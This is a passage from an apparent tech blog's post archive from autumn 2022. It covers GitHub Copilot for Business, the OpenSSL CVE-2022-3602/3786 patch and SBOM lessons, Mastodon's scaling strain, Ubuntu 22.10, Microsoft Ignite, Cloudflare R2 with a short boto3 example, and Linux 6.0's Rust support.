AI handles the tedious parts so I can focus on the interesting parts.\nMy Take # GitHub Universe 2022 confirms that AI-assisted development is no longer experimental — it\u0026rsquo;s the product. Copilot for Business will drive enterprise adoption, free Codespaces will boost open-source contribution, and the Actions improvements will make platform engineering teams\u0026rsquo; lives easier.\nThe question I keep coming back to is: what does this mean for junior developers? If AI handles the boilerplate, how do newcomers build the intuition that comes from writing it themselves? I don\u0026rsquo;t have a good answer yet, but it\u0026rsquo;s a question our industry needs to grapple with as these tools become ubiquitous.\nFor now, if you haven\u0026rsquo;t tried Copilot, give it a shot. If you maintain open-source projects, add a devcontainer.json. And if you\u0026rsquo;re an engineering manager, Copilot for Business just removed your last excuse for not evaluating it.\n","date":"10 November 2022","externalUrl":null,"permalink":"/posts/221110-github-universe-2022-copilot-business/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub Universe 2022 puts AI front and center with Copilot for Business, while Codespaces and Actions get meaningful upgrades.","title":"GitHub Universe 2022 — Copilot for Business and the AI-Assisted Future","type":"posts"},{"content":"On Tuesday, November 1st, the OpenSSL project released version 3.0.7, patching two high-severity vulnerabilities: CVE-2022-3602 and CVE-2022-3786. Both are buffer overflow issues in the X.509 certificate verification code, specifically in the handling of punycode in email address name constraints. 
What made this event notable wasn\u0026rsquo;t just the vulnerabilities themselves — it was the week of anticipation that preceded them.\nThe Pre-Announcement That Shook the Industry # On October 25th, the OpenSSL project announced that a critical security fix would be released on November 1st. They didn\u0026rsquo;t say what the vulnerability was, only that it affected OpenSSL 3.0 and above and was rated \u0026ldquo;CRITICAL\u0026rdquo; — the highest severity.\nThe internet collectively held its breath. The last OpenSSL flaw to cause this level of alarm was Heartbleed in 2014, which affected an estimated 17% of the internet\u0026rsquo;s secure web servers; the project had used the CRITICAL rating only once before, for CVE-2016-6309 in 2016. Organizations around the world started preparing: inventorying which systems ran OpenSSL 3.0, staging patch deployments, and drafting incident response plans. This pattern mirrors the urgency seen when supply chain vulnerabilities emerge at critical infrastructure layers.\nI spent part of last week auditing our own infrastructure. The good news was that most production systems still run OpenSSL 1.1.1, which isn\u0026rsquo;t affected. The concerning discovery was how many container base images had quietly moved to OpenSSL 3.0 — several of our build containers based on Ubuntu 22.04 and Alpine 3.17 were in scope.\nWhat The Vulnerabilities Actually Are # When the details emerged on November 1st, the community\u0026rsquo;s reaction was a mixture of relief and slight anticlimax. The original CRITICAL rating was downgraded to HIGH before release, after further analysis showed the vulnerabilities were harder to exploit than initially assessed.\nCVE-2022-3602 is a 4-byte buffer overflow that can be triggered during X.509 certificate verification when a certificate contains a specially crafted punycode-encoded email address. 
CVE-2022-3786 is a related overflow in the same code path, but can only overwrite the buffer with the period character (.), limiting its exploitability.\nFor exploitation, an attacker would need either a malicious CA to sign a crafted certificate, or a legitimate CA to issue a certificate with the malicious payload. The victim\u0026rsquo;s application would need to be using OpenSSL 3.0+ and have certificate verification enabled. Many platforms also have stack overflow protections that would turn the exploit into a denial-of-service rather than code execution.\nThis significantly narrows the attack surface compared to Heartbleed, which could be exploited remotely against any server running affected OpenSSL versions. But \u0026ldquo;hard to exploit\u0026rdquo; isn\u0026rsquo;t the same as \u0026ldquo;impossible to exploit,\u0026rdquo; and patching should still be treated as urgent.\nThe SBOM Question # This event has reignited discussions about Software Bills of Materials (SBOMs) and dependency visibility. When the pre-announcement dropped, the first question every security team asked was: \u0026ldquo;Where are we running OpenSSL 3.0?\u0026rdquo; The challenge of tracking library dependencies across an organization is one of the hardest unsolved problems in modern software development.\nFor many organizations, answering this question was surprisingly difficult. OpenSSL is embedded in countless applications, libraries, and container images. Your Python application might use it through the ssl module. Your Node.js runtime links against it. Your Java application might use it through native TLS bindings. It\u0026rsquo;s everywhere, and tracking it requires systematic dependency management.\nThis is exactly the use case SBOMs are designed for. If you had generated SBOMs for your container images and deployed artifacts, you could have queried them to identify affected systems within minutes. 
Instead, most teams spent hours or days manually auditing their infrastructure.\nThe NIST SBOM guidelines and the Biden administration\u0026rsquo;s Executive Order 14028 on cybersecurity have been pushing for SBOM adoption, but adoption remains low. Events like this should be the wake-up call.\nContainer Image Implications # The container ecosystem adds a layer of complexity to OpenSSL patching. If you\u0026rsquo;re running applications in Docker containers, your OpenSSL version depends on which base image you used and when you built it. A container built from ubuntu:22.04 three months ago has a different OpenSSL version than one built today.\nThis is why image scanning tools like Trivy, Grype, and Snyk Container exist. They can scan your running containers and registry images for known vulnerabilities, including this one. If you\u0026rsquo;re not already running these in your CI/CD pipeline, now is the time to start.\nThe patch workflow for containers is: update your base images, rebuild your application containers, scan them to confirm the fix, and redeploy. For organizations with hundreds of microservices, this can take days. Automating as much of this pipeline as possible — automated base image updates via Dependabot or Renovate, automated rebuilds, automated scanning — turns a week-long scramble into a routine operation.\nMy Take # The handling of this vulnerability was, on balance, good. The pre-announcement gave organizations time to prepare. The downgrade from CRITICAL to HIGH was responsible — it reflected updated analysis rather than marketing. And the patch was released on schedule.\nBut the week of uncertainty also exposed how unprepared many organizations are for rapid patching. 
If it takes your team a week to answer \u0026ldquo;where do we run this library?\u0026rdquo; you have a visibility problem that needs addressing before the next critical CVE drops.\nMy recommendations coming out of this event: implement SBOM generation in your build pipeline, run container image scanning in CI/CD, and maintain an inventory of your cryptographic library dependencies. The infrastructure for secure software supply chains needs to be as critical as the application code itself. The next OpenSSL vulnerability might not be downgraded.\n","date":"3 November 2022","externalUrl":null,"permalink":"/posts/221103-openssl-critical-vulnerability-response/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The OpenSSL 3.0.7 patch for CVE-2022-3602 and CVE-2022-3786 arrived this week — here’s what happened and what it teaches us about vulnerability response.","title":"OpenSSL's Critical Vulnerability — Lessons From a Week of Preparation","type":"posts"},{"content":"With Elon Musk\u0026rsquo;s acquisition of Twitter closing today, there\u0026rsquo;s been a massive wave of users migrating to Mastodon, the open-source, decentralized social network. Mastodon has reportedly gained over 200,000 new users in the past week alone, and the numbers keep climbing. As both a long-time open-source advocate and someone who runs infrastructure for a living, this moment is fascinating — and raises some serious technical questions.\nThe ActivityPub Architecture Under Pressure # Mastodon is built on ActivityPub, a W3C standard for decentralized social networking. Instead of a single company running all the servers, anyone can run a Mastodon instance (server) that federates — shares content — with other instances across the network.\nThis is elegant in theory, but the current surge is stress-testing the architecture in ways it hasn\u0026rsquo;t experienced before. 
Each Mastodon instance is essentially an independent Ruby on Rails application backed by PostgreSQL, with Redis for caching and Sidekiq for background job processing. When a post federates, it needs to be delivered to every instance that has followers of that user. For popular accounts, that means thousands of HTTP POST requests per message.\nI\u0026rsquo;ve been watching the infrastructure metrics from several large instances, and the bottleneck is consistently in the Sidekiq job queues. Federation delivery jobs pile up faster than they can be processed, creating delays of minutes to hours for posts to appear on remote instances. The architecture wasn\u0026rsquo;t designed for this kind of throughput, and it shows.\nThe Instance Admin Challenge # What makes this migration unique is that Mastodon\u0026rsquo;s infrastructure is run by volunteers. The largest instances — mastodon.social, mastodon.online, mstdn.social — are operated by individuals or small teams, often funded by Patreon or donations. When you go from 10,000 active users to 100,000 in a week, your infrastructure costs don\u0026rsquo;t increase linearly. They spike dramatically.\nInstance administrators are scrambling to scale their PostgreSQL databases, add Sidekiq workers, and increase their Redis memory allocations. Some have set up GoFundMe campaigns to cover unexpected hosting bills. Others have temporarily closed registrations to prevent their instances from becoming unusable.\nThis is the uncomfortable truth about decentralization: it distributes the technical and financial burden to people who may not have the resources or expertise to handle it. Running a social media server for a few hundred friends is very different from running one for tens of thousands of strangers.\nWhat Mastodon Gets Right # Despite the scaling challenges, there are aspects of Mastodon\u0026rsquo;s architecture that are genuinely well-designed. The ActivityPub protocol means no single point of failure. 
If mastodon.social goes down, the rest of the network continues operating. Your identity isn\u0026rsquo;t tied to a company\u0026rsquo;s business model.\nThe content moderation model is also interesting. Each instance sets its own rules, and instances can block or silence other instances. This creates a layered moderation approach where communities can set their own standards while still participating in the broader network. After years of watching centralized platforms struggle with content moderation at scale, this federated approach has clear advantages.\nFrom a developer perspective, the Mastodon API is clean and well-documented. It\u0026rsquo;s broadly compatible with the Twitter API v1 patterns, which has made it relatively easy for developers to build clients and tools. The ecosystem of third-party apps — Tusky, Ice Cubes, Ivory (in development) — is growing rapidly.\nThe Technical Improvements Needed # For Mastodon to sustain this growth, several technical challenges need addressing. The federation delivery system needs to be more efficient — perhaps batching deliveries by instance rather than sending individual requests. The search functionality is intentionally limited (you can only search hashtags by default, not full text), which is a deliberate design choice but frustrates new users coming from Twitter.\nThe onboarding experience is also a significant barrier. Asking new users to choose an instance before they understand what instances are creates unnecessary friction. The joinmastodon.org site tries to help, but the concept of federation is inherently more complex than \u0026ldquo;sign up for Twitter.\u0026rdquo;\nThere\u0026rsquo;s also the question of long-term sustainability. The current funding model — donations and Patreon — works for small instances but doesn\u0026rsquo;t scale to the infrastructure demands of a platform serving millions. 
Someone needs to figure out how to fund decentralized infrastructure sustainably, and I don\u0026rsquo;t think anyone has cracked that yet.\nMy Take # I set up my own Mastodon instance a couple of years ago, mostly out of curiosity. It\u0026rsquo;s been a quiet corner of the internet where I occasionally post about infrastructure topics. This week, it suddenly feels a lot less quiet.\nI\u0026rsquo;m cautiously optimistic about this moment. The underlying technology — ActivityPub, federation, open-source social networking — is sound. The principles are right: users should own their social graph, moderation should be community-driven, and no single company should control public discourse.\nBut I\u0026rsquo;ve been in tech long enough to know that surviving a hype cycle is harder than starting one. The real test for Mastodon isn\u0026rsquo;t whether it can handle this week\u0026rsquo;s traffic spike — it\u0026rsquo;s whether the community can build the infrastructure, tooling, and funding models to sustain growth over years.\nIf you\u0026rsquo;re a developer thinking about joining Mastodon, I\u0026rsquo;d encourage it. Pick a smaller, well-moderated instance rather than piling onto mastodon.social. And if you have infrastructure experience, consider helping an instance admin — they could use it right now.\nThe fediverse is having its moment. 
Let\u0026rsquo;s see if it can make it last.\n","date":"27 October 2022","externalUrl":null,"permalink":"/posts/221027-mastodon-decentralized-social-scaling/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As users flood to Mastodon following the Twitter acquisition, the open-source platform faces its biggest infrastructure test yet.","title":"Mastodon's Moment — Can Decentralized Social Scale?","type":"posts"},{"content":"Canonical released Ubuntu 22.10 \u0026ldquo;Kinetic Kudu\u0026rdquo; today, and while interim releases don\u0026rsquo;t get the same fanfare as LTS versions, they serve an important purpose in the Ubuntu ecosystem. They\u0026rsquo;re the proving ground for what lands in the next long-term support release, and for developers, they offer early access to updated toolchains that can matter for day-to-day work.\nThe Toolchain Updates That Actually Matter # The headline developer-facing changes are in the default toolchain. Ubuntu 22.10 ships with GCC 12.2, Python 3.10.7, and OpenSSL 3.0 as the default. For those of us building and deploying applications, these aren\u0026rsquo;t just version bumps — they have real implications.\nGCC 12 brings improved diagnostics and better C++20/23 support. If you\u0026rsquo;re working on C or C++ projects, the improved error messages alone are worth the upgrade. I\u0026rsquo;ve been using GCC 12 in containers for a few months now, and the quality-of-life improvements in compilation errors have saved me more debugging time than I\u0026rsquo;d like to admit.\nPython 3.10 as the system default is noteworthy because it means the match statement (structural pattern matching) and improved error messages are now available out of the box. If you\u0026rsquo;ve been developing against 3.10+ features but your CI servers were still on 3.9, this simplifies things.\nThe OpenSSL 3.0 default is the one that will cause the most headaches. 
OpenSSL 3.0 deprecated a number of legacy algorithms and changed the provider architecture significantly. Applications that relied on older ciphers or the legacy API will need updates. I\u0026rsquo;ve already seen this cause issues in several Node.js projects where native modules were compiled against OpenSSL 1.1.\nGNOME 43 and the Desktop Story # For desktop users, Ubuntu 22.10 brings GNOME 43 with its new quick settings panel and continued GTK4/libadwaita migration. The quick settings redesign is genuinely useful — it consolidates Wi-Fi, Bluetooth, dark mode, and power settings into a single, cleanly organized panel.\nThe more interesting desktop change is the continued adoption of PipeWire as the default audio server, replacing PulseAudio. PipeWire has been remarkably stable in my experience, handling both audio and screen sharing (particularly in Wayland sessions) better than the PulseAudio-based setup it replaces.\nIf you\u0026rsquo;re a developer who does screen sharing during pair programming sessions or demos, PipeWire on Wayland is a significant improvement. The days of \u0026ldquo;let me switch to X11 so screen sharing works\u0026rdquo; are finally numbered.\nSnap Packages: The Ongoing Debate # Ubuntu 22.10 continues Canonical\u0026rsquo;s push toward Snap packages, with Firefox remaining a Snap and more system applications moving to the format. This remains one of the most divisive decisions in the Ubuntu community.\nI understand the arguments on both sides. Snaps solve real problems around dependency isolation and automatic updates. But the startup time penalty is noticeable, especially on older hardware, and the mandatory Snap Store backend frustrates those who prefer fully open infrastructure.\nFor server-side development — which is where most of us interact with Ubuntu professionally — Snaps are largely irrelevant. Server deployments use debs, containers, or direct binary deployments. 
The Snap debate is primarily a desktop concern, but it does affect developer workstations, and slow application startup times on your dev machine are a real productivity issue.\nWhat This Means for the Next LTS # The real value of Ubuntu 22.10 is as a preview of Ubuntu 24.04 LTS, which is about 18 months away. The toolchain choices being tested now — GCC 12, Python 3.10+, OpenSSL 3.0, PipeWire — will likely form the foundation of that release.\nIf you\u0026rsquo;re running Ubuntu 22.04 LTS in production (as many of us are), now is the time to start testing your applications against these newer toolchain versions. OpenSSL 3.0 migration in particular can be disruptive, and you don\u0026rsquo;t want to discover compatibility issues when you\u0026rsquo;re under pressure to upgrade.\nI\u0026rsquo;ve started running our CI pipelines against both 22.04 and 22.10 base images to catch any toolchain compatibility issues early. It\u0026rsquo;s a small investment that pays off significantly when the next LTS drops.\nMy Take # Interim Ubuntu releases don\u0026rsquo;t get a lot of love, and honestly, I wouldn\u0026rsquo;t recommend most people run them in production. The nine-month support window is too short for any serious deployment. But as a developer, installing 22.10 on a secondary machine or using it as a container base for testing is a smart move.\nThe most impactful change in this release is the OpenSSL 3.0 default. If you haven\u0026rsquo;t started testing your applications against OpenSSL 3.0, let this be your reminder. The migration from 1.1 to 3.0 is one of those changes that seems minor until it breaks your TLS configuration in production.\nUbuntu continues to be the dominant Linux distribution for cloud workloads and developer machines, and releases like 22.10 are part of why. They provide a structured, predictable path for toolchain evolution that the broader ecosystem can plan around. 
Not exciting, perhaps, but reliable — and in infrastructure, reliable wins.\n","date":"20 October 2022","externalUrl":null,"permalink":"/posts/221020-ubuntu-2210-kinetic-kudu/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Ubuntu 22.10 ships with updated toolchains and GNOME 43, but the real story is what it previews for the next LTS cycle.","title":"Ubuntu 22.10 Kinetic Kudu — What Matters for Server-Side Developers","type":"posts"},{"content":"Microsoft Ignite kicked off this week, and while the keynote had its usual polish, the real substance was buried in the breakout sessions and product announcements. After attending these events for years — sometimes in person, sometimes virtually — I\u0026rsquo;ve learned to look past the marketing slides and focus on what\u0026rsquo;s actually shipping. This year, Azure\u0026rsquo;s infrastructure story is genuinely compelling.\nAzure Cosmos DB for PostgreSQL: A Smart Pivot # The announcement that caught my eye first was Azure Cosmos DB for PostgreSQL. Microsoft has essentially rebranded and deeply integrated Citus — the distributed PostgreSQL extension they acquired back in 2019 — into the Cosmos DB family.\nThis is significant because it acknowledges what many of us have been saying for years: PostgreSQL is the de facto standard for relational workloads, and enterprises want to scale it horizontally without abandoning the ecosystem they know. By bringing it under the Cosmos DB umbrella, Microsoft is betting that developers would rather scale PostgreSQL than learn a new query language or data model.\nI\u0026rsquo;ve worked on projects where we had to choose between the familiarity of PostgreSQL and the scalability of a distributed database. Having a managed, horizontally-scalable Postgres option in Azure removes that tradeoff for a lot of use cases. 
The key question will be how seamless the Citus distribution layer really is when you throw complex queries at it — but the direction is right.\nAzure Kubernetes Fleet Manager # Another announcement worth paying attention to is Azure Kubernetes Fleet Manager, which moves into public preview. If you\u0026rsquo;re managing multiple AKS clusters — and in any serious enterprise deployment, you are — this tool addresses a real pain point.\nFleet Manager provides a unified control plane for orchestrating updates, managing configurations, and distributing workloads across multiple clusters. Think of it as the \u0026ldquo;cluster of clusters\u0026rdquo; management layer that Kubernetes itself doesn\u0026rsquo;t provide natively. GitOps tools like ArgoCD have been the workaround for many teams.\nI\u0026rsquo;ve seen organizations try to solve this with custom tooling wrapped around ArgoCD or Flux, and it\u0026rsquo;s always messy. Every team ends up building their own multi-cluster abstraction, and they\u0026rsquo;re all slightly different. Having a first-party solution from Azure that handles progressive rollouts across clusters is the kind of boring-but-essential infrastructure work that actually matters.\nThe multi-cluster problem is one of the big unsolved challenges in the Kubernetes ecosystem. Google has Anthos, AWS has EKS Anywhere, and now Azure has Fleet Manager. None of these are perfect, but the fact that all three major clouds are investing heavily tells you the demand is real.\nMicrosoft Dev Box Goes GA # Microsoft Dev Box reaching general availability is interesting from a developer experience perspective. It provides cloud-based development workstations that can be pre-configured with project-specific tools, dependencies, and source code.\nI\u0026rsquo;ll admit I was skeptical about cloud-based dev environments when GitHub Codespaces first launched. But after using them for several projects this year, I\u0026rsquo;ve come around. 
The ability to spin up a fully configured development environment in minutes — rather than spending half a day fighting with local setup scripts — is genuinely productive. This builds on the broader shift toward cloud-first development.\nDev Box takes a slightly different approach from Codespaces by providing full Windows desktop environments rather than VS Code-centric containers. This matters for teams doing .NET development, game development, or anything that needs a full IDE experience. The per-hour pricing model makes it accessible for projects where you don\u0026rsquo;t need the environment running 24/7.\nAzure Container Apps Updates # The updates to Azure Container Apps are worth noting too. The service — which sits between Azure Functions and full AKS in terms of complexity — is getting Dapr integration improvements and better scaling controls.\nContainer Apps occupies an interesting niche. It gives you the simplicity of a PaaS with enough Kubernetes underneath that you\u0026rsquo;re not completely abstracted away from the container runtime. For teams that want to deploy containerized workloads without managing cluster infrastructure, it\u0026rsquo;s becoming a solid option.\nWhat I appreciate about this approach is that it doesn\u0026rsquo;t try to hide the fact that containers are involved. You still write Dockerfiles, you still think about container images, but the scheduling and scaling is handled for you. It\u0026rsquo;s the kind of pragmatic middle ground that works well for medium-complexity applications.\nMy Take # The overarching theme at Ignite this year is Microsoft meeting developers where they are rather than trying to pull them onto proprietary platforms. PostgreSQL support in Cosmos DB, Kubernetes fleet management, cloud dev environments — these are all about making existing workflows better rather than replacing them. 
This mirrors Microsoft\u0026rsquo;s broader platform consolidation strategy that has been accelerating.\nThis strategy is working. Azure\u0026rsquo;s growth continues to accelerate, and it\u0026rsquo;s largely because they\u0026rsquo;ve become the cloud that enterprise development teams actually want to use, not just the one their procurement department chose.\nThe challenge for Microsoft will be execution. These announcements are promising, but the gap between \u0026ldquo;public preview\u0026rdquo; and \u0026ldquo;production-ready for my workload\u0026rdquo; can be significant. I\u0026rsquo;ll be watching Fleet Manager and Cosmos DB for PostgreSQL closely over the coming months to see how they handle real-world edge cases.\nFor now, if you\u0026rsquo;re an Azure shop, this week\u0026rsquo;s announcements should give you confidence that the platform is evolving in the right direction. And if you\u0026rsquo;re not an Azure shop, several of these ideas — particularly multi-cluster management and cloud dev environments — are worth exploring regardless of your cloud provider.\n","date":"13 October 2022","externalUrl":null,"permalink":"/posts/221013-microsoft-ignite-2022-azure/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft Ignite 2022 delivered a wave of Azure updates that signal where enterprise cloud infrastructure is heading next.","title":"Microsoft Ignite 2022 — Azure's Quiet Infrastructure Revolution","type":"posts"},{"content":"Cloudflare has made R2 object storage generally available, and this one deserves attention from anyone who\u0026rsquo;s ever grimaced at an AWS bill. R2 is S3-compatible object storage with a radical pricing twist: zero egress fees. 
In an industry where data transfer costs have become a significant line item — and a major source of vendor lock-in — Cloudflare is going straight for the jugular.\nI\u0026rsquo;ve been testing R2 throughout the beta, and with the GA release landing during Cloudflare\u0026rsquo;s Birthday Week, it\u0026rsquo;s time to take a serious look at what this means for cloud architecture decisions.\nThe Egress Fee Problem # To understand why R2 matters, you need to understand the economics of cloud storage. AWS S3 charges $0.023 per GB per month for standard storage — that\u0026rsquo;s the part everyone focuses on during planning. But the egress fees — the cost to actually retrieve your data — are $0.09 per GB for the first 10TB, then slightly declining at scale.\nFor many workloads, egress costs dwarf storage costs. A CDN serving 100TB per month from S3 is paying around $2,300 in storage but $9,000 in egress. A data analytics pipeline that regularly pulls large datasets from S3 can accumulate surprising transfer bills. I\u0026rsquo;ve seen organizations where egress fees account for 40-60% of their total storage costs.\nThese fees also create a powerful lock-in mechanism. Moving your data to another provider means paying egress on every byte you transfer out. The larger your dataset, the more expensive it is to leave. It\u0026rsquo;s a clever business model, but it\u0026rsquo;s not one that serves customers well.\nCloudflare\u0026rsquo;s R2 eliminates egress fees entirely. Storage is priced at $0.015 per GB per month (cheaper than S3 Standard), and you pay only for operations (Class A at $4.50 per million, Class B at $0.36 per million). No egress. No transfer fees. No lock-in tax.\nS3 Compatibility and Migration Path # R2 implements the S3 API, which means existing tools and libraries work with minimal changes. If your application uses the AWS SDK, you can point it at R2 by changing the endpoint URL and credentials. 
I\u0026rsquo;ve tested this with boto3, the AWS CLI (with --endpoint-url), and several backup tools — the compatibility is solid for the core operations.\nimport json import boto3 r2 = boto3.client( \u0026#34;s3\u0026#34;, endpoint_url=\u0026#34;https://\u0026lt;account_id\u0026gt;.r2.cloudflarestorage.com\u0026#34;, aws_access_key_id=\u0026#34;\u0026lt;r2_access_key\u0026gt;\u0026#34;, aws_secret_access_key=\u0026#34;\u0026lt;r2_secret_key\u0026gt;\u0026#34;, ) # Standard S3 operations work as expected r2.put_object(Bucket=\u0026#34;my-bucket\u0026#34;, Key=\u0026#34;data.json\u0026#34;, Body=json.dumps(data)) r2.get_object(Bucket=\u0026#34;my-bucket\u0026#34;, Key=\u0026#34;data.json\u0026#34;)\nThat said, R2 doesn\u0026rsquo;t implement every S3 feature. Notable gaps at GA include:\nNo object versioning (in development); no lifecycle policies (in development); no server-side encryption with customer-managed keys; no S3 Select or Glacier-style tiered storage; limited event notification support.\nFor many use cases — static asset storage, backup destinations, data distribution, CDN origins — these gaps don\u0026rsquo;t matter. For complex data lake architectures that depend on versioning and lifecycle policies, S3 remains the more complete product.\nWhere R2 Makes Immediate Sense # Based on my testing and the pricing model, several use cases stand out:\nCDN origin storage: If you\u0026rsquo;re already using Cloudflare\u0026rsquo;s CDN (and many of us are), R2 as your origin storage is a natural fit. Assets flow from R2 through Cloudflare\u0026rsquo;s network with zero egress cost. The integration with Workers for dynamic content generation is also compelling.\nBackup and archive: The zero egress model is particularly attractive for backups, where you store data regularly but retrieve it rarely — and when you do retrieve it, you want to do so quickly and without surprise costs. 
I\u0026rsquo;ve already migrated several backup workflows from S3 to R2.\nMulti-cloud data distribution: If you serve data to consumers across different cloud providers or on-premises environments, R2 eliminates the egress penalty that makes multi-cloud architectures expensive.\nDeveloper and open-source projects: The free tier (10GB storage, 10 million Class B operations per month) is generous enough for small projects, and the absence of egress fees removes the fear of unexpected bills from traffic spikes.\nThe Competitive Landscape # R2 isn\u0026rsquo;t the only S3 alternative. Backblaze B2, Wasabi, and MinIO (for self-hosted) have been viable options for years. But Cloudflare brings something the others can\u0026rsquo;t easily match: a global edge network.\nR2 storage is distributed across Cloudflare\u0026rsquo;s network, and when combined with Workers (their serverless compute platform), you get a compelling stack for building globally distributed applications. The vision is clearly to offer a complete cloud platform that competes not just on storage pricing but on the overall developer experience.\nAWS isn\u0026rsquo;t standing still either. They\u0026rsquo;ve been gradually reducing data transfer costs and introducing initiatives like the AWS Free Tier for data transfer. But the fundamental pricing model — where egress is a profit centre — is deeply embedded in AWS\u0026rsquo;s business. It\u0026rsquo;s hard to see them matching R2\u0026rsquo;s zero-egress model without significant revenue impact.\nGoogle Cloud\u0026rsquo;s move to waive egress fees for customers migrating away was a notable competitive response, but it\u0026rsquo;s a one-time migration benefit rather than an ongoing pricing model change.\nMy Take # Cloudflare R2 at GA is a solid product for specific use cases, not a universal S3 replacement. The feature gaps are real, and for complex storage requirements, S3\u0026rsquo;s maturity and ecosystem depth remain unmatched. 
But for the use cases where R2 fits — and there are many — the cost savings are substantial and the migration path is straightforward.\nWhat I find most significant is the competitive pressure R2 puts on the broader cloud storage market. Even if you never use R2, its existence may lead to lower egress fees across all providers. Competition in cloud infrastructure pricing has been tepid for years, and Cloudflare is the most credible challenger to emerge in some time.\nMy recommendation: identify your highest-egress workloads, evaluate whether R2\u0026rsquo;s feature set is sufficient, and run the numbers. For many teams, this could be one of the easiest cost optimisations of the year. Start with a non-critical workload, validate the S3 compatibility against your specific usage patterns, and expand from there.\nThe cloud storage market just got more interesting, and that\u0026rsquo;s good for all of us.\n","date":"6 October 2022","externalUrl":null,"permalink":"/posts/221006-cloudflare-r2-storage-wars/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Cloudflare R2’s general availability challenges AWS S3’s dominance with zero egress fees and full S3 API compatibility, reshaping the economics of cloud storage.","title":"Cloudflare R2 Goes GA — The S3-Compatible Storage War Heats Up","type":"posts"},{"content":"Linus Torvalds released Linux 6.0 this week, and true to form, he immediately downplayed the version number. \u0026ldquo;I\u0026rsquo;d like to note (yet again) that we don\u0026rsquo;t do feature-based releases, and that \u0026lsquo;6.0\u0026rsquo; doesn\u0026rsquo;t mean anything more than that the 5.x numbers were getting big enough that I ran out of fingers and toes,\u0026rdquo; he wrote in the announcement. Classic Linus.\nBut while the version number itself may be arbitrary — Torvalds famously bumped from 2.x to 3.x and from 4.x to 5.x on similar whims — the contents of this release are anything but trivial. 
Linux 6.0 packs genuine technical significance, including the initial infrastructure for Rust in the kernel, meaningful performance work, and continued hardware enablement that keeps Linux relevant across everything from phones to supercomputers.\nRust Enters the Kernel (Sort Of) # The headline feature for many developers is the inclusion of initial Rust infrastructure in the kernel build system. To be clear about what this means right now: Linux 6.0 doesn\u0026rsquo;t ship Rust-written drivers or subsystems. What it includes is the foundational tooling — the build system integration, the abstractions, and the framework — that will allow Rust code to coexist with C in future kernel development. This represents a major step in Rust\u0026rsquo;s adoption for systems programming.\nThis has been a long journey. The Rust-for-Linux project, led by Miguel Ojeda, has been developing these patches for over two years. The inclusion in mainline represents a significant milestone, even though practical Rust kernel modules are still some way off. Recent Rust releases like 1.63 continue to stabilize systems programming features that kernel developers depend on.\nWhy does this matter? Because memory safety bugs account for roughly 70% of serious security vulnerabilities in systems code, according to studies from both Microsoft and Google\u0026rsquo;s Project Zero. The Linux kernel, written almost entirely in C, is not immune to this. Buffer overflows, use-after-free bugs, and null pointer dereferences are a constant battle.\nRust\u0026rsquo;s ownership model and borrow checker eliminate entire categories of these bugs at compile time. The potential for writing safer device drivers and kernel modules — the areas where most security bugs cluster — is genuinely compelling. I\u0026rsquo;ve spent enough years debugging memory corruption issues in C to appreciate what this could mean for kernel reliability. 
Memory safety has long been a critical issue in security-critical systems.\nThat said, let\u0026rsquo;s be realistic. The kernel has over 30 million lines of C code. Nobody is rewriting that in Rust. The practical path is new drivers and modules written in Rust, gradually expanding the safe-code surface area over many years. It\u0026rsquo;s an evolutionary approach, and it\u0026rsquo;s the right one.\nPerformance Improvements That Matter # Beyond the Rust story, Linux 6.0 brings several performance improvements that will matter to anyone running production workloads:\nImproved memory management: The Multi-Gen LRU (MGLRU) page reclamation mechanism, which has been in development for some time, continues to mature. Early benchmarks show significant improvements in memory-pressure scenarios, particularly for workloads with large working sets. If you\u0026rsquo;re running databases or caching layers on Linux, this is directly relevant.\nCPU scheduling refinements: The scheduler has received attention for better handling of hybrid architectures, such as Intel processors that mix performance and efficiency cores in the style of Arm\u0026rsquo;s big.LITTLE. As these become standard in both laptop and server silicon, the kernel\u0026rsquo;s ability to make intelligent scheduling decisions becomes increasingly important.\nFile system work: Btrfs receives ongoing reliability and performance improvements, and there\u0026rsquo;s continued work on the io_uring asynchronous I/O framework that\u0026rsquo;s becoming the preferred path for high-performance applications. 
The io_uring improvements in particular are worth tracking if you\u0026rsquo;re building latency-sensitive network services.\nHardware Enablement # The breadth of hardware support in each kernel release is something I think people take for granted, but it represents an enormous amount of engineering effort:\nInitial support for Intel\u0026rsquo;s upcoming Meteor Lake and Arrow Lake platforms AMD Zen 4 support improvements RISC-V architecture enhancements, including better SMP support ARM improvements targeting both mobile and server workloads LoongArch architecture support continuing to mature The RISC-V work is particularly interesting to me. We\u0026rsquo;re watching an open-source instruction set architecture gain real kernel support alongside the dominant proprietary architectures. The parallel between open-source software and open-source hardware is playing out in real time.\nThe Kernel Development Model Still Works # What continues to impress me about the Linux kernel project — and I\u0026rsquo;ve been following it since the early 2.x days — is that the development model scales. Linux 6.0 includes contributions from over 2,000 developers representing hundreds of companies. The merge window, release candidate, and final release cadence produces a new stable kernel roughly every 9-10 weeks, and it\u0026rsquo;s been doing so reliably for years.\nThis is a project with over 30 million lines of code, thousands of active contributors, and stakes that include running most of the world\u0026rsquo;s servers, smartphones, embedded devices, and supercomputers. The fact that it continues to ship on schedule with high quality is a testament to the development process, the maintainer hierarchy, and the tooling around it.\nThe kernel mailing list can be a rough place, and the project has had its share of cultural challenges. 
But the engineering process works, and Linux 6.0 is proof of that.\nMy Take # Linux 6.0 isn\u0026rsquo;t a revolution — it\u0026rsquo;s an evolution, and that\u0026rsquo;s exactly what you want from the software that underpins most of the world\u0026rsquo;s computing infrastructure. The Rust support is the most forward-looking change, and I\u0026rsquo;m cautiously optimistic about what it means for kernel security over the next decade.\nIf you maintain production Linux systems, the upgrade path from 5.19 to 6.0 should be straightforward for most workloads. The LTS kernel (5.15) remains a solid choice for conservative environments, but I\u0026rsquo;d encourage testing 6.0 in staging to familiarise yourself with the changes.\nAfter three decades in this industry, the Linux kernel remains one of the most impressive collaborative engineering efforts in human history. Version 6.0 is another solid step forward, and the foundation it lays for Rust in the kernel could prove to be one of the most significant architectural decisions of the decade. Sometimes the most impactful changes are the quiet ones.\n","date":"29 September 2022","externalUrl":null,"permalink":"/posts/220929-linux-kernel-6-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Linux 6.0 arrives with Rust language support, performance improvements, and new hardware enablement — but the real story is what the version bump 